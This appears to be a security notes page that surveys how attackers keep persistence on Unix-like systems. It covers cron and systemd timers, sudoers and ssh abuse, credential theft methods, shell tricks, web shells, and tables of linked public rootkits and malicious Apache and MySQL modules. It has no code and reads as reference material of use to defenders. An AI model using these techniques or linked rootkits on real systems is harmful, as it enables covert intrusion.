There are a number of systems on Unix-like hosts that may be abused by malware to maintain persistence on a host.
MITRE maintains comprehensive lists of Linux and MacOS persistence mechanisms.
Scheduled Jobs
There are many ways to schedule a jobs on *nix systems. All of these schedulers may be abused as persistence mechanisms.
| Method | Operating System | Notes |
| cron | all | https://crontab.guru |
| at | all | |
| systemd timers | Linux | https://wiki.archlinux.org/index.php/Systemd/Timers https://opensource.com/article/20/7/systemd-timers |
| periodic | FreeBSD | https://www.freebsddiary.org/periodic.php |
Startup Scripts
*nix systems provide convenient methods to execute code when a system boots. Attackers can abuse this functionality to maintain persistence on a host.
sudo
sudo is a program which enables systems administrators to grant access to users to execute commands as another user. Most often, sudo is used to allow a regular user to execute commands as root. Attackers may abuse existing sudo configurations or add their own entries to sudoers (sudo’s configuration files) as a persistent method to elevate their privileges.
ssh
ssh is the most popular method of remotely administrating Unix-like systems. As such, it is a popular choice for attackers to abuse to maintain persistence on a host.
Abusing Accounts
Attackers often abuse accounts to main access. Credentials may be obtained by an attacker in a variety of ways:
| Method | Notes |
| Default credentials | https://github.com/droberson/rtfm/blob/master/defaults.md |
| Cracking hashes | |
| Brute force | |
| Spraying | |
| Sniffing | |
| Social engineering | |
| Creating rogue accounts |
Rootkits
Rootkits are malware which maintain access to a system by hiding an attacker’s presence. This is typically done by means of a malicious kernel module, abusing the dynamic linker (LD_PRELOAD, DYLD_INSERT_LIBRARIES), or replacing userland software with malicious code.
Here are some examples of publicly available rootkits for Unix-like systems.
| Rootkit | Operating System | Notes |
| Reptile | Linux | https://github.com/f0rb1dd3n/Reptile |
| vlany | Linux | https://github.com/mempodippy/vlany |
| FreeBSD Rootkit | FreeBSD | https://github.com/chkyass/Freebsd-Rootkit |
| Nuk3Gh0st | Linux | https://github.com/ropch4ins/Nuk3Gh0st |
| Jynx2 | Linux | https://github.com/chokepoint/Jynx2 |
| rkorova | Linux | https://github.com/nopn0p/rkorova |
| Azazel | Linux | https://github.com/chokepoint/azazel |
| Z34107 | Linux | https://github.com/qunxyz/Z34107 |
| inficere | MacOS | https://github.com/enzolovesbacon/inficere |
| Vixen | Solaris | https://github.com/patrobinson/Vixen |
Malicious Software Modules
Many advanced pieces of software provide means to load modules which extend their functionality. This functionality can be abused to load malicious modules which provide an attacker with illicit access to a system.
| Malicious Module | Software | Notes |
| apache-rootkit | Apache | https://github.com/ChristianPapathanasiou/apache-rootkit |
| mod-rootme | Apache | https://github.com/sajith/mod-rootme |
| MySQL User-Defined Functions | MySQL | https://www.exploit-db.com/papers/44139 |
Abusing Shell Functionality
Shells can be abused in a number of ways to maintain persistence on a host.
| Method | Notes |
| profiles and rc files | |
| traps | https://bash.cyberciti.biz/guide/Trap_statement |
| PATH hijacking |
External Services
Attackers often abuse functionality of legitimate services, leverage bugs in these services, add backdoor code to a service, or create their own services with an intent of maintaining access on a host.
Web Shells
Web servers allow code execution. Naturally, attackers have created web-based shells which abuse this functionality.
Traffic Signalling
Send a magic packet or sequence of packets to a host to gain access to a system.
*nix malware 